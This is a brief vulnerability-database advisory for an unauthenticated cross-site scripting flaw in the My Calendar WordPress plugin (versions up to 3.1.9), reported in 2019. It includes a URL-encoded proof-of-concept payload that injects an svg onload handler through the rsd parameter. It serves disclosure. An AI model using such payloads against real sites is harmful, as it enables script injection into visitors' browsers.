My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)

2019-05-03T00:00:00
ID WPVDB-ID:9267
Type wpvulndb
Reporter Joe Dolson
Modified 2019-05-03T00:00:00

Description

WordPress Vulnerability - My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS) http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2FOPENBUGBOUNTY%2F)%3E